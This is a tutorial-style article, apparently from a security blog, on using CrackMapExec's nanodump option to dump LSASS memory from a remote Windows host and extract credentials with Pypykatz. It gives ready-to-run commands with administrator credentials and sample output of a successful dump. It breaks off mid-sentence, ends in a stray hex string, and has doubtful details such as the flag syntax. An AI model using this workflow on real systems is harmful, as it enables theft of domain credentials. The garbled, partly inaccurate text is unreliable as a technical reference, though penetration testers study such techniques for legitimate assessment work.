How to Use CrackMapExec to Dump LSASS Memory with NanoDump
CrackMapExec (CME) is a powerful post-exploitation tool that can help you automate the security assessment of large Active Directory networks. One of the features of CME is the ability to dump the LSASS process memory from remote hosts and extract credentials using tools like Mimikatz or Pypykatz.
Crackmapexec Nanodump
In this article, we will show you how to use CME's nanodump module, which is a lightweight and stealthy alternative to dumping LSASS memory. NanoDump uses direct system calls and avoids writing any files to disk, making it harder to detect by antivirus or endpoint protection software.
Prerequisites
To follow this tutorial, you will need:
A Linux machine with CME installed. You can install CME from the official GitHub repository or use the Kali Linux package.
A Windows domain controller with an Active Directory domain. We will use ms.evilcorp.org as an example.
A domain user account with administrative privileges on the domain controller. We will use Administrator@ms.evilcorp.org with password poplab!sec as an example.
A target Windows host that is part of the domain and has SMB enabled. We will use 192.168.1.15 as an example.
Dumping LSASS Memory with NanoDump
To dump LSASS memory with NanoDump, we need to use CME's SMB protocol module and specify the --nanodump option along with the domain user credentials. For example:
crackmapexec smb 192.168.1.15 -u 'Administrator' -p 'poplab!sec' --nanodump
This command will connect to the target host using SMB, inject NanoDump into memory using a technique called reflective DLL injection, dump LSASS memory using direct system calls, and send it back to CME over SMB.
The output of the command will look something like this:
SMB 192.168.1.15 445 WIN-PC [*] Windows 10 Pro 19042 x64 (name:WIN-PC) (domain:ms.evilcorp.org) (signing:True) (SMBv1:False)
SMB 192.168.1.15 445 WIN-PC [+] ms.evilcorp.org\Administrator:poplab!sec (Pwn3d!)
SMB 192.168.1.15 445 WIN-PC [+] Dumping lsass remotely using nanodump
SMB 192.168.1.15 445 WIN-PC [+] Lsass dump stored at /root/.cme/logs/nanodump/192.168.1.15_nanodump.dmp
The dumped LSASS memory file will be stored in the /root/.cme/logs/nanodump/ directory on the Linux machine.
Extracting Credentials from LSASS Memory Dump
To extract credentials from the LSASS memory dump, we can use tools like Mimikatz or Pypykatz. In this tutorial, we will use Pypykatz, which is a Python implementation of Mimikatz that can parse LSASS dumps offline.
To install Pypykatz, we can use pip:
pip install pypykatz
To parse the LSASS dump file, we can use the pypykatz lsa minidump command and specify the file path:
pypykatz lsa minidump /root/.cme/logs/nanodump/192.168.1.15_nanodump.dmp
This command will output the credentials found in the LSASS dump, such as usernames, passwords, hashes, tickets, etc.
The output of the command will look
c8f7815bcf